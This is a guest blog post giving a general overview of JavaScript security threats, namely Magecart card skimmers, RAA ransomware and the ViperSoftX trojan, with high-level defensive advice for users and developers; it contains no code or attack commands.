This blog was written by an independent guest blogger.
JavaScript is a very useful programming language. Netscape developers invented JavaScript in 1995, and it revolutionized the web. Before JavaScript, webpages could pretty much only contain text, images, and hyperlinks. JavaScript empowered web developers to make webpages interactive, dynamic rather than static. Think of picture menus that animated when your mouse cursor went over it, and applets that could give you your local weather forecast or tell you which web browser you’re using. And JavaScript can do many other things. As time went on, JavaScript became increasingly powerful. And it’s still commonly used, nearly 26 years later. The advent of HTML5 and later versions of CSS has given web developers more options for using client-side scripting to make webpages dynamic. But while Adobe Flash is dead, JavaScript is as popular as ever. I believe JavaScript is amazing.
Unfortunately, as a certain superhero says, “with great power comes great responsibility.” If JavaScript is used in the wrong way, a user’s privacy and security can be at risk. JavaScript is often used to fingerprint users-- which web browser they’re using, which operating system they’re using, their IP address, and so on. Because of these privacy concerns, some clients such as Tor Browser warn about JavaScript being enabled and ask the user if they’d like to disable it. Unfortunately JavaScript is used so frequently across the web that disabling it can break the functionality of many popular websites and web apps in significant ways. Many web apps won’t even load at all without JavaScript being enabled.
The web is one of the most common vectors for user-targeting cyber threats. So let’s examine some of them, and then consider some ways to deal with them.
JavaScript skimmers
Card skimmers are a common means of stealing credit card and debit card data from consumers through ATMs and point-of-sale devices. They usually manifest as a physical device that’s placed on top of a legitimate card reader. Retailers and banks are often unaware when a threat actor puts a card skimmer on one of their machines.
JavaScript skimmers are a similar concept, but as JavaScript code injected into an online retailer’s software-based point-of-sale. One cyber attack group, Magecart, is known to inject JavaScript skimmers into ecommerce sites. Magecart started to become a significant threat in early 2020. They’re known to carefully study the vulnerabilities in specific ecommerce sites and design their web application penetration accordingly.
Ecommerce retailers should conduct application security testing on their own websites so they can remove Magecart’s JavaScript skimmers and protect their customers accordingly. There isn’t much that users can do, as disabling JavaScript in their web browsers can break too much functionality. Online retailers need to be proactive.
JavaScript ransomware
One of the earliest examples of JavaScript-based ransomware emerged in 2016, and it’s called RAA. It appeared as a JavaScript file (.js) attached to an email. If opened on a Windows machine, it’d execute in Windows Based Script Host.
This was an effective way to execute malware on a Windows machine, as a JavaScript file isn’t flagged as potentially harmful such as a EXE or BAT file.
It’s Russian ransom note demanded about $250 in cryptocurrency for a user to recover their files. But these days, ransomware is more likely to target enterprise and institutional computers, demand greater ransoms, and even steal data from victims-- an attack on confidentiality, not just availability.
ViperSoftX
ViperSoftX is a JavaScript-based Remote Access Trojan that was discovered in 2019. It targets Windows vulnerabilities, and it’s designed to steal cryptocurrency. It steals cryptocurrency by looking for cryptocurrency wallet data on a targeted PC. Ethereum and Bitcoin are really what it likes, and those are two of the most commonly used cryptocurrencies around.
Once ViperSoftX establishes persistence by copying itself into the user’s %APPDATA%, it injects data into HTTP headers to communicate with the cyber attacker’s command and control servers. It really is a terrible piece of malware, and it’s evidence that JavaScript exploits are becoming much more sophisticated lately.
What can users do?
As mentioned earlier, disabling JavaScript in most web browsers is possible. But as more than 90% of webpages use JavaScript, disabling it is often very impractical.
Fortunately there are other things that users can do to protect themselves from many JavaScript exploits.
Startpage is one of the most popular search platforms that are designed to protect user privacy. It does so by acting as a proxy, keeping the user anonymous while delivering Google search results. You might wonder what this has to do with protecting a user from JavaScript exploits. Well, if you search with Startpage and click on the Anonymous View icon in your chosen search result, the feature will act as a web proxy while you’re on the new webpage. JavaScript will run normally, but it’ll only be able to fingerprint Startpage’s server, not the user’s client machine. This protects their privacy from web servers.
So that’s something users can do. But what about developers?
OWASP recommends a number of Source Code Analysis Tools for the web. These are applications designed specifically for developers to security test for certain vulnerabilities. There are some Source Code Analysis Tools that are designed to find JavaScript vulnerabilities, such as Agnitio, BlueClosure BC Detect, and CodeSec. Some of these tools work directly in an IDE, preventing JavaScript vulnerabilities from being deployed in the first place.
JavaScript is a wonderful thing. But it’s good for users and developers alike to be vigilant and aware of its risks.
